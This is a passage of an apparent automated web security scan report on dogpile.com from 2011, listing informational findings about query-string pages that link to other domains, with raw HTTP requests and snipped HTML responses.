http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=6ed1b194da28448c8f14c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:06 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:06 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:06 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 42209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
</style>

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.38. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/categories/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/categories/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=777fa7dd1d194287abe2c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:50 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:50 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:49 GMT
Connection: close
Content-Length: 41765
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="search, web, images, news, audio, mp3, shopping, message boards, multimedia"/>

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.39. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.com; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=fabc047e90564b3caea8c16a3af0cb01&ActionId=c6139e801eee4175a160c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:15 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:15 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:15 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:15 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 64601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="Faq, frequently asked questions, meta search, metasearch, Infospace, dogpile, dogpile.com" />

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<div id="icePage_SearchBoxTop_ctl02" class="sbattrib">
<img id="icePage_SearchBoxTop_sbattribution" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/partner_logos.gif/_iceUrlFlag=15?_IceUrl=true" alt="Search Providers" style="border-width:0px;" />
</div>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
<a id="icePage_DPFooter_AboutImage" href="http://www.infospaceinc.com/about/"><img id="icePage_DPFooter_imgINSP" title="Infospace..." src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Infospace..." style="height:19px;width:74px;border-width:0px;" /></a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_About" href="http://www.infospaceinc.com/about/">About Infospace</a>
...[SNIP]...
<li>
<a id="icePage_DPFooter_MercantilaLink" href="http://www.mercantila.com/">Mercantila</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...

11.40. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11?_IceUrl=true

The response contains the following links to other domains:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico
http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/SuggestClient-min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/insp_logo.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true
http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true
http://www.infospaceinc.com/about/
http://www.mercantila.com/

Request

GET /dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=0bca44db8e72477aac9fc16a3af0cb01&ActionId=4c6c32f6a3134224805dc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:17 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:17 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:17 GMT
Connection: close
Content-Length: 64278
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>

...[SNIP]...
<meta name="Keywords" content="Faq, frequently asked questions, meta search, metasearch, Infospace, dogpile, dogpile.com" />

<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/reset-fonts-grids.css/_iceUrlFlag=15?_IceUrl=true" />
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/base-min.css/_iceUrlFlag=15?_IceUrl=true" />

<style id="icePage_DocumentStyle_DynamicStyles" type="text/css">
...[SNIP]...
</style>
<link rel="Stylesheet" type="text/css" href="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/customizations.css/_iceUrlFlag=15?_IceUrl=true" />


<link rel="icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="shortcut icon" type="image/x-icon" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/200902/favicon.ico" />
<link rel="search" type="application/opensearchdescription+xml" title="Dogpile.com" href="http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml" />

</head>
...[SNIP]...
<a id="icePage_DPHeaderLogo_HeaderImageLink" href="http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11?_IceUrl=true"><img id="icePage_DPHeaderLogo_DPLogo" title="Dogpile" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/dogpile_header_resultslogo.gif/_iceUrlFlag=15?_IceUrl=true" alt="Dogpile. All the best search engines piled into one." style="border-width:0px;" /></a>
...[SNIP]...
<a onclick="toggleAdvSearch('icePage_SearchBoxTop_AdvSearchLinkRight_AdvLnkWrapper_AdvOptionLnk');">Close <img id="icePage_SearchBoxTop_AdvSearchCloseImage" title="Close" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/btn_adv_close.gif/_iceUrlFlag=15?_IceUrl=true" alt="Close" style="border-width:0px;" /></a>
...[SNIP]...
</div>

<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-1.2.6.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
<script type="text/javascript" src='http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/jquery-ui-personalized-1.5.2.min.js/_iceUrlFlag=15?_IceUrl=true'></script>
...[SNIP]...
<div id="icePage_SearchBoxBottom_ArfieImage" class="arfieImage">
               <img id="icePage_SearchBoxBottom_ArfieImageContent" Title="" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/result_arfie.gif/_iceUrlFlag=15?_IceUrl=true" alt="Arfie" style="border-width:0px;" />
           </div>
...[SNIP]...
</div>

<script type="text/javascript" language="JavaScript" src="http://ttl60m.dp.infospace.com.edgesuite.net/dogpile_other/ws/519/ws.js/_iceUrlFlag=15?_IceUrl=true"></script>
...[SNIP]...
<div class="inspFooterContent" id="inspFooterContent">
